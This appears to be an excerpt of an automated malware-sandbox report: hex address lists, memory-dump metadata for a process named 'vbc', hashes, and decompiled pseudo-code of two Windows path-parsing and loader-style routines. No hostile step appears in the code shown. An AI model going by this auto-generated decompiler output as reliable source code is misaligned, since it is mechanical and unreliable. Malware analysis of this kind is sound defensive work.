                                                  0x016862b7
                                                  0x016862b8
                                                  0x016862bb
                                                  0x016862bd
                                                  0x016862c0
                                                  0x016862c4
                                                  0x016862cd
                                                  0x016862cd
                                                  0x016862c0
                                                  0x016862bb
                                                  0x016862b5
                                                  0x01686302
                                                  0x01686303
                                                  0x01686305
                                                  0x01686305
                                                  0x01686305
                                                  0x0168630c
                                                  0x0168630c
                                                  0x00000000
                                                  0x0168627e
                                                  0x01686269
                                                  0x01685eac
                                                  0x01685ebb
                                                  0x01685ebe
                                                  0x01685ecb
                                                  0x01685ecb
                                                  0x01685ece
                                                  0x01685ece
                                                  0x01685ed4
                                                  0x01685ed7
                                                  0x01685ed9
                                                  0x01685edb
                                                  0x01685edb
                                                  0x01685ee1
                                                  0x01685ee1
                                                  0x01685ee3
                                                  0x01685f20
                                                  0x01685f20
                                                  0x01685ee5
                                                  0x01685ee5
                                                  0x01685ee5
                                                  0x01685ee8
                                                  0x01685f11
                                                  0x01685f18
                                                  0x01685eea
                                                  0x01685eea
                                                  0x01685eed
                                                  0x01685ef2
                                                  0x01685ef8
                                                  0x01685efb
                                                  0x01685f0a
                                                  0x01685f0a
                                                  0x01685eed
                                                  0x01685ee8
                                                  0x01685f22
                                                  0x01685f28
                                                  0x00000000
                                                  0x00000000
                                                  0x01685f30
                                                  0x01685f31
                                                  0x01685f37
                                                  0x01685f3a
                                                  0x01685f3d
                                                  0x01685f44
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01685f46
                                                  0x01685f48
                                                  0x01685f4d
                                                  0x00000000
                                                  0x01685f4d
                                                  0x01685dda
                                                  0x01685ddf
                                                  0x00000000
                                                  0x01685ddf
                                                  0x01685dd8
                                                  0x01685da7
                                                  0x01685da9
                                                  0x01685dac
                                                  0x01685dae
                                                  0x00000000
                                                  0x01685db4
                                                  0x01685db4
                                                  0x00000000
                                                  0x01685db4
                                                  0x01685dae
                                                  0x01685d88
                                                  0x01685d8d
                                                  0x01686363
                                                  0x01686369
                                                  0x0168636a
                                                  0x01686370
                                                  0x01686372
                                                  0x0168637a
                                                  0x0168637b
                                                  0x0168637d
                                                  0x00000000
                                                  0x00000000
                                                  0x0168637f
                                                  0x01686385
                                                  0x00000000
                                                  0x01686385
                                                  0x01685d38
                                                  0x01685d3b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01685d3b
                                                  0x01685d27
                                                  0x01685d29
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01686360
                                                  0x00000000
                                                  0x01686360
                                                  0x01685c10
                                                  0x01685c10
                                                  0x016863da
                                                  0x016863e5
                                                  0x016863e5

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce17e0144499481ca1784b39342f6e746f73d403e156d18718815bf791e5254d
                                                  • Instruction ID: bfee04be7c1375ba46df8669131560c317df073a116919cb6a8cf93b7c443607
                                                  • Opcode Fuzzy Hash: ce17e0144499481ca1784b39342f6e746f73d403e156d18718815bf791e5254d
                                                  • Instruction Fuzzy Hash: 03422975900229CFDB24DF68CD80BA9BBB1FF49304F1582AAD94DAB342D7749985CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015D4120 Relevance: .4, Instructions: 444COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E015D4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x16ad360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E015EF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E015D6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L015D4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E015D6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M015D45F8))) {
												case 0:
													_v568 = 0x1591078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x15911c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L015D4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E015FF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E015FF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E015B52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E015CEB70(1, 0x16a79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E015CAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E015F95D0();
																			L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E015FB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E015F3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E015FB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                  0x015d4128
                                                  0x015d4135
                                                  0x015d413c
                                                  0x015d4141
                                                  0x015d4145
                                                  0x015d4147
                                                  0x015d414e
                                                  0x015d4151
                                                  0x015d4159
                                                  0x015d415c
                                                  0x015d4160
                                                  0x015d4164
                                                  0x015d4168
                                                  0x015d416c
                                                  0x015d417f
                                                  0x015d4181
                                                  0x015d446a
                                                  0x015d446a
                                                  0x015d418c
                                                  0x015d4195
                                                  0x015d4199
                                                  0x015d4432
                                                  0x015d4439
                                                  0x015d443d
                                                  0x015d4442
                                                  0x015d4447
                                                  0x00000000
                                                  0x015d419f
                                                  0x015d41a3
                                                  0x015d41b1
                                                  0x015d41b9
                                                  0x015d41bd
                                                  0x015d45db
                                                  0x015d45db
                                                  0x00000000
                                                  0x015d41c3
                                                  0x015d41c3
                                                  0x015d41ce
                                                  0x015d41d4
                                                  0x0161e138
                                                  0x0161e13e
                                                  0x0161e169
                                                  0x0161e16d
                                                  0x0161e19e
                                                  0x0161e16f
                                                  0x0161e16f
                                                  0x0161e175
                                                  0x0161e179
                                                  0x0161e18f
                                                  0x0161e193
                                                  0x00000000
                                                  0x0161e199
                                                  0x00000000
                                                  0x0161e199
                                                  0x0161e193
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015d41da
                                                  0x015d41da
                                                  0x015d41df
                                                  0x015d41e4
                                                  0x015d41ec
                                                  0x015d4203
                                                  0x015d4207
                                                  0x0161e1fd
                                                  0x015d4222
                                                  0x015d4226
                                                  0x0161e1f3
                                                  0x0161e1f3
                                                  0x015d422c
                                                  0x015d422c
                                                  0x015d4233
                                                  0x0161e1ed
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015d4239
                                                  0x015d4239
                                                  0x015d4239
                                                  0x015d4239
                                                  0x015d4233
                                                  0x015d4226
                                                  0x015d41ee
                                                  0x015d41ee
                                                  0x015d41f4
                                                  0x015d4575
                                                  0x0161e1b1
                                                  0x0161e1b1
                                                  0x00000000
                                                  0x015d457b
                                                  0x015d457b
                                                  0x015d4582
                                                  0x0161e1ab
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015d4588
                                                  0x015d4588
                                                  0x015d458c
                                                  0x0161e1c4
                                                  0x0161e1c4
                                                  0x00000000
                                                  0x015d4592
                                                  0x015d4592
                                                  0x015d4599
                                                  0x0161e1be
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015d459f
                                                  0x015d459f
                                                  0x015d45a3
                                                  0x0161e1d7
                                                  0x0161e1e4
                                                  0x00000000
                                                  0x015d45a9
                                                  0x015d45a9
                                                  0x015d45b0
                                                  0x0161e1d1
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015d45b6
                                                  0x015d45b6
                                                  0x015d45b6
                                                  0x00000000
                                                  0x015d45b6
                                                  0x015d45b0
                                                  0x015d45a3
                                                  0x015d4599
                                                  0x015d458c
                                                  0x015d4582
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015d41f4
                                                  0x015d423e
                                                  0x015d4241
                                                  0x015d45c0
                                                  0x015d45c4
                                                  0x00000000
                                                  0x015d45ca
                                                  0x015d45ca
                                                  0x00000000
                                                  0x0161e207
                                                  0x0161e20f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015d45d1
                                                  0x00000000
                                                  0x00000000
                                                  0x015d45ca
                                                  0x00000000
                                                  0x015d4247
                                                  0x015d4247
                                                  0x015d4247
                                                  0x015d4249
                                                  0x015d4249
                                                  0x015d4249
                                                  0x015d4251
                                                  0x015d4251
                                                  0x015d4257
                                                  0x015d425f
                                                  0x015d426e
                                                  0x015d4270
                                                  0x015d427a
                                                  0x0161e219
                                                  0x0161e219
                                                  0x015d4280
                                                  0x015d4282
                                                  0x015d4456
                                                  0x015d45ea
                                                  0x00000000
                                                  0x015d45f0
                                                  0x0161e223
                                                  0x00000000
                                                  0x0161e223
                                                  0x015d445c
                                                  0x015d445c
                                                  0x00000000
                                                  0x015d445c
                                                  0x00000000
                                                  0x015d4288
                                                  0x015d428c
                                                  0x0161e298
                                                  0x015d4292
                                                  0x015d4292
                                                  0x015d429e
                                                  0x015d42a3
                                                  0x015d42a7
                                                  0x015d42ac
                                                  0x0161e22d
                                                  0x015d42b2
                                                  0x015d42b2
                                                  0x015d42b9
                                                  0x015d42bc
                                                  0x015d42c2
                                                  0x015d42ca
                                                  0x015d42cd
                                                  0x015d42cd
                                                  0x015d42d4
                                                  0x015d433f
                                                  0x015d433f
                                                  0x015d42d6
                                                  0x015d42d6
                                                  0x015d42d9
                                                  0x015d42dd
                                                  0x015d42eb
                                                  0x0161e23a
                                                  0x015d42f1
                                                  0x015d4305
                                                  0x015d430d
                                                  0x015d4315
                                                  0x015d4318
                                                  0x015d431f
                                                  0x015d4322
                                                  0x015d432e
                                                  0x015d433b
                                                  0x015d433b
                                                  0x00000000
                                                  0x015d432e
                                                  0x015d42eb
                                                  0x015d434c
                                                  0x015d434e
                                                  0x015d4352
                                                  0x015d4359
                                                  0x015d435e
                                                  0x015d4361
                                                  0x015d436e
                                                  0x015d438a
                                                  0x015d438e
                                                  0x015d4396
                                                  0x015d439e
                                                  0x015d43a1
                                                  0x015d43ad
                                                  0x015d43bb
                                                  0x015d43bb
                                                  0x015d43ad
                                                  0x015d436e
                                                  0x015d43bf
                                                  0x015d43c5
                                                  0x015d4463
                                                  0x015d4463
                                                  0x015d43ce
                                                  0x015d43d5
                                                  0x015d43d9
                                                  0x015d43df
                                                  0x015d4475
                                                  0x015d4479
                                                  0x015d4491
                                                  0x015d4491
                                                  0x015d4479
                                                  0x015d43e5
                                                  0x015d43eb
                                                  0x015d43f4
                                                  0x015d43f6
                                                  0x015d43f9
                                                  0x015d43fc
                                                  0x015d43ff
                                                  0x015d44e8
                                                  0x015d44ed
                                                  0x015d44f3
                                                  0x0161e247
                                                  0x00000000
                                                  0x015d44f9
                                                  0x015d4504
                                                  0x015d4508
                                                  0x015d450f
                                                  0x0161e269
                                                  0x00000000
                                                  0x015d4515
                                                  0x015d4519
                                                  0x015d4531
                                                  0x015d4534
                                                  0x015d4537
                                                  0x015d453e
                                                  0x015d4541
                                                  0x015d454a
                                                  0x0161e255
                                                  0x0161e255
                                                  0x0161e25b
                                                  0x0161e25e
                                                  0x0161e261
                                                  0x0161e261
                                                  0x015d4555
                                                  0x015d4559
                                                  0x015d455d
                                                  0x0161e26d
                                                  0x0161e270
                                                  0x0161e274
                                                  0x0161e27a
                                                  0x0161e27d
                                                  0x0161e28e
                                                  0x0161e28e
                                                  0x015d4563
                                                  0x015d4563
                                                  0x015d4569
                                                  0x015d4569
                                                  0x00000000
                                                  0x015d455d
                                                  0x015d450f
                                                  0x00000000
                                                  0x015d44f3
                                                  0x015d43ff
                                                  0x015d4405
                                                  0x015d4405
                                                  0x015d4405
                                                  0x015d42ac
                                                  0x015d428c
                                                  0x015d4282
                                                  0x015d4407
                                                  0x015d440d
                                                  0x0161e2af
                                                  0x0161e2af
                                                  0x015d4413
                                                  0x015d4413
                                                  0x00000000
                                                  0x015d41d4
                                                  0x00000000
                                                  0x015d41c3
                                                  0x015d41bd
                                                  0x015d4415
                                                  0x015d4415
                                                  0x015d4416
                                                  0x015d4417
                                                  0x015d4429
                                                  0x015d416e
                                                  0x015d416e
                                                  0x015d4175
                                                  0x015d4498
                                                  0x015d449f
                                                  0x0161e12d
                                                  0x00000000
                                                  0x0161e133
                                                  0x00000000
                                                  0x0161e133
                                                  0x015d44a5
                                                  0x015d44a5
                                                  0x015d44aa
                                                  0x00000000
                                                  0x015d44bb
                                                  0x015d44ca
                                                  0x015d44d6
                                                  0x015d44d7
                                                  0x015d44d8
                                                  0x015d44e3
                                                  0x015d44e3
                                                  0x015d44aa
                                                  0x015d417b
                                                  0x015d417b
                                                  0x015d417b
                                                  0x00000000
                                                  0x015d417b
                                                  0x015d4175
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 186351bcfc7118a434c106ddc7e7045cc63092c5b084626b7ebf4a7a745b5c06
                                                  • Instruction ID: 5308c7fb83c69564588c1262c21ebeffee7ee3e73f246a9737644120cbd60e12
                                                  • Opcode Fuzzy Hash: 186351bcfc7118a434c106ddc7e7045cc63092c5b084626b7ebf4a7a745b5c06
                                                  • Instruction Fuzzy Hash: 7FF16B706082128FC725CF5DC480A7ABBE1BF88714F58892EF986CBB50E735D885CB52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015E20A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E015E20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x16a8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E015E2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E015E2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E015B58EC(_t240);
									_t221 =  *0x16a5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x16a5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E015F4A2C(0x16a6e40, 0x15f4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E015D7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
